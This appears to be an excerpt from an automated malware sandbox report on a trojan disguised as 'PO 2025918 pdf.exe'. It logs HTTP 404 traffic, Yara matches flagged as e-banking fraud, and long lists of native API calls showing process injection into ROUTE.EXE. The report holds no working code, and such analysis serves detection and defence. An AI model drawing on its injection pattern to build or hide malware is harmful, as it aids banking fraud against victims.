                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 11:02:25 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 
20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 14 Jan 2025 11:02:27 GMT; Server: Apache; Content-Length: 32106; Connection: close; Content-Type: text/html; charset=utf-8
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Length: 146; Content-Type: text/html; Date: Tue, 14 Jan 2025 11:02:47 GMT; Server: nginx; Connection: close; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Length: 146; Content-Type: text/html; Date: Tue, 14 Jan 2025 11:02:50 GMT; Server: nginx; Connection: close; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Length: 146; Content-Type: text/html; Date: Tue, 14 Jan 2025 11:02:52 GMT; Server: nginx; Connection: close; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Length: 146; Content-Type: text/html; Date: Tue, 14 Jan 2025 11:02:55 GMT; Server: nginx; Connection: close; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0; Date: Tue, 14 Jan 2025 11:03:12 GMT; Transfer-Encoding: chunked; Connection: close; Data Raw: 30 0d 0a 0d 0a; Data Ascii: 0

                      E-Banking Fraud

                      Source: Yara match, File source: 5.2.PO 2025918 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.PO 2025918 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.3895986128.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.3896619038.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2460325125.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_0042C9C3 NtClose,5_2_0042C9C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_0040AD20 NtDelayExecution,5_2_0040AD20
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2B60 NtClose,LdrInitializeThunk,5_2_016D2B60
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_016D2DF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_016D2C70
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D35C0 NtCreateMutant,LdrInitializeThunk,5_2_016D35C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D4340 NtSetContextThread,5_2_016D4340
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D4650 NtSuspendThread,5_2_016D4650
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2BE0 NtQueryValueKey,5_2_016D2BE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2BF0 NtAllocateVirtualMemory,5_2_016D2BF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2BA0 NtEnumerateValueKey,5_2_016D2BA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2B80 NtQueryInformationFile,5_2_016D2B80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2AF0 NtWriteFile,5_2_016D2AF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2AD0 NtReadFile,5_2_016D2AD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2AB0 NtWaitForSingleObject,5_2_016D2AB0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2D30 NtUnmapViewOfSection,5_2_016D2D30
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2D00 NtSetInformationFile,5_2_016D2D00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2D10 NtMapViewOfSection,5_2_016D2D10
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2DD0 NtDelayExecution,5_2_016D2DD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2DB0 NtEnumerateKey,5_2_016D2DB0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2C60 NtCreateKey,5_2_016D2C60
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2C00 NtQueryInformationProcess,5_2_016D2C00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2CF0 NtOpenProcess,5_2_016D2CF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2CC0 NtQueryVirtualMemory,5_2_016D2CC0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2CA0 NtQueryInformationToken,5_2_016D2CA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2F60 NtCreateProcessEx,5_2_016D2F60
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2F30 NtCreateSection,5_2_016D2F30
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2FE0 NtCreateFile,5_2_016D2FE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2FA0 NtQuerySection,5_2_016D2FA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2FB0 NtResumeThread,5_2_016D2FB0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2F90 NtProtectVirtualMemory,5_2_016D2F90
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2E30 NtWriteVirtualMemory,5_2_016D2E30
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2EE0 NtQueueApcThread,5_2_016D2EE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2EA0 NtAdjustPrivilegesToken,5_2_016D2EA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D2E80 NtReadVirtualMemory,5_2_016D2E80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D3010 NtOpenDirectoryObject,5_2_016D3010
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D3090 NtSetValueKey,5_2_016D3090
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D39B0 NtGetContextThread,5_2_016D39B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D3D70 NtOpenThread,5_2_016D3D70
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe, Code function: 5_2_016D3D10 NtOpenProcessToken,5_2_016D3D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03084340 NtSetContextThread,LdrInitializeThunk,8_2_03084340
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03084650 NtSuspendThread,LdrInitializeThunk,8_2_03084650
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082B60 NtClose,LdrInitializeThunk,8_2_03082B60
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03082BA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03082BE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03082BF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082AD0 NtReadFile,LdrInitializeThunk,8_2_03082AD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082AF0 NtWriteFile,LdrInitializeThunk,8_2_03082AF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082F30 NtCreateSection,LdrInitializeThunk,8_2_03082F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082FB0 NtResumeThread,LdrInitializeThunk,8_2_03082FB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082FE0 NtCreateFile,LdrInitializeThunk,8_2_03082FE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03082E80
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03082EE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03082D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03082D30
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082DD0 NtDelayExecution,LdrInitializeThunk,8_2_03082DD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03082DF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082C60 NtCreateKey,LdrInitializeThunk,8_2_03082C60
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03082C70
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03082CA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_030835C0 NtCreateMutant,LdrInitializeThunk,8_2_030835C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_030839B0 NtGetContextThread,LdrInitializeThunk,8_2_030839B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082B80 NtQueryInformationFile,8_2_03082B80
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082AB0 NtWaitForSingleObject,8_2_03082AB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082F60 NtCreateProcessEx,8_2_03082F60
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082F90 NtProtectVirtualMemory,8_2_03082F90
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082FA0 NtQuerySection,8_2_03082FA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082E30 NtWriteVirtualMemory,8_2_03082E30
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082EA0 NtAdjustPrivilegesToken,8_2_03082EA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082D00 NtSetInformationFile,8_2_03082D00
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082DB0 NtEnumerateKey,8_2_03082DB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082C00 NtQueryInformationProcess,8_2_03082C00
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082CC0 NtQueryVirtualMemory,8_2_03082CC0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03082CF0 NtOpenProcess,8_2_03082CF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03083010 NtOpenDirectoryObject,8_2_03083010
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03083090 NtSetValueKey,8_2_03083090
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03083D10 NtOpenProcessToken,8_2_03083D10
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_03083D70 NtOpenThread,8_2_03083D70
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_02849340 NtReadFile,8_2_02849340
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_028491D0 NtCreateFile,8_2_028491D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_02849640 NtAllocateVirtualMemory,8_2_02849640
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_028494D0 NtClose,8_2_028494D0
                      Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 8_2_02849430 NtDeleteFile,8_2_02849430
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0176B16B5_2_0176B16B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AB1B05_2_016AB1B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175F0E05_2_0175F0E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017570E95_2_017570E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A70C05_2_016A70C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0174F0CC5_2_0174F0CC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168D34C5_2_0168D34C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175132D5_2_0175132D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E739A5_2_016E739A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017412ED5_2_017412ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BB2C05_2_016BB2C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A52A05_2_016A52A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017575715_2_01757571
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173D5B05_2_0173D5B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016914605_2_01691460
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175F43F5_2_0175F43F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175F7B05_2_0175F7B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017516CC5_2_017516CC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A99505_2_016A9950
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BB9505_2_016BB950
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170D8005_2_0170D800
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A38E05_2_016A38E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FB765_2_0175FB76
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01715BF05_2_01715BF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016DDBF95_2_016DDBF9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BFB805_2_016BFB80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01713A6C5_2_01713A6C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01757A465_2_01757A46
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FA495_2_0175FA49
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0174DAC65_2_0174DAC6
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016E5AA05_2_016E5AA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173DAAC5_2_0173DAAC
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01757D735_2_01757D73
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A3D405_2_016A3D40
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01751D5A5_2_01751D5A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BFDC05_2_016BFDC0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01719C325_2_01719C32
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FCF25_2_0175FCF2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FF095_2_0175FF09
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175FFB15_2_0175FFB1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A1F925_2_016A1F92
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A9EB05_2_016A9EB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310A3528_2_0310A352
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305E3F08_2_0305E3F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031103E68_2_031103E6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F02748_2_030F0274
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030D02C08_2_030D02C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030401008_2_03040100
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030EA1188_2_030EA118
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030D81588_2_030D8158
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031041A28_2_031041A2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031101AA8_2_031101AA
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031081CC8_2_031081CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030E20008_2_030E2000
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030747508_2_03074750
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030507708_2_03050770
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0304C7C08_2_0304C7C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306C6E08_2_0306C6E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030505358_2_03050535
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031105918_2_03110591
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F44208_2_030F4420
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031024468_2_03102446
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030FE4F68_2_030FE4F6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310AB408_2_0310AB40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03106BD78_2_03106BD7
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0304EA808_2_0304EA80
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030669628_2_03066962
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030529A08_2_030529A0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0311A9A68_2_0311A9A6
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030528408_2_03052840
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305A8408_2_0305A840
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030368B88_2_030368B8
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0307E8F08_2_0307E8F0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03092F288_2_03092F28
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03070F308_2_03070F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F2F308_2_030F2F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030C4F408_2_030C4F40
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030CEFA08_2_030CEFA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03042FC88_2_03042FC8
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305CFE08_2_0305CFE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310EE268_2_0310EE26
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03050E598_2_03050E59
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310CE938_2_0310CE93
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03062E908_2_03062E90
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310EEDB8_2_0310EEDB
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305AD008_2_0305AD00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030ECD1F8_2_030ECD1F
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03068DBF8_2_03068DBF
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0304ADE08_2_0304ADE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03050C008_2_03050C00
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F0CB58_2_030F0CB5
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_03040CF28_2_03040CF2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310132D8_2_0310132D
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0303D34C8_2_0303D34C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0309739A8_2_0309739A
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030552A08_2_030552A0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0306B2C08_2_0306B2C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030F12ED8_2_030F12ED
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0308516C8_2_0308516C
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0303F1728_2_0303F172
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0311B16B8_2_0311B16B
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0305B1B08_2_0305B1B0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030FF0CC8_2_030FF0CC
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_030570C08_2_030570C0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310F0E08_2_0310F0E0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_031070E98_2_031070E9
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0310F7B08_2_0310F7B0
